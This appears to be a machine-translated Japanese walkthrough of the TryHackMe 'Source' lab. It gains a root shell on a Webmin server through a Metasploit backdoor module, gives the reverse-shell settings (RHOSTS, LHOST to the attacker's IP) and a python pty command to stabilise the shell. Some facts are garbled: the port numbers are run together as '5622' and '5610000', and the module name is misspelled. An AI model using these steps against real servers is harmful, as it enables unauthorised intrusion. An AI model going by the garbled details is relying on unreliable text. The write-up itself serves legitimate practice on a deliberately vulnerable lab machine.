tryhackme ( thm )-ソースの書き込み

2693 ワード


ソース


最近の脆弱性とハッキングWebmin、ウェブベースのシステム構成ツールを利用してください.
ルームリンクはこちら

リンク タック



このタスクに接続されているボックスを列挙してルートを設定します.あなたは混乱の源を発見し、それを制御するために活用できますか?
私はチャレンジごとにnmapとIPをスキャンしてチャレンジを開始するつもりです.
10.10.38.68 ->ソース.THM
nmap -sV -sC -A source.thm

出力:


ポート5622は、SSH用です.ポート5610000はWebminのデフォルトポートです.リンクは以下のようになります.
https://10.10.38.68:10000

残念ながら我々はSSHとWebminのユーザ名とパスワードを知りませんでした.
gobuster dir -u https://10.10.38.68:10000 -w /usr/share/wordlists/dirb/common.txt

最後のオプションは、metasploitのexploitを探すことでした.

そして、より多くの脆弱点があります、そして、私が使用したexploitは5“exploit/linux/http/webminchen backdoor”です.

そして今、これらのコマンドの後にlport、rhosts、sslをtrueに設定する必要があります.
set RHOSTS 10.10.38.68 (Machine IP)
set LHOST 10.11.61.213 (YOUR IP)
set ssl true
そして、exploitを実行するには、単にrun/exploitと入力します.

シェルを安定させるには以下のコマンドを実行します.
echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
そして、ブーム!我々は安定したシェルを持っている
我々が今する必要があるすべては、旗を見つけることです.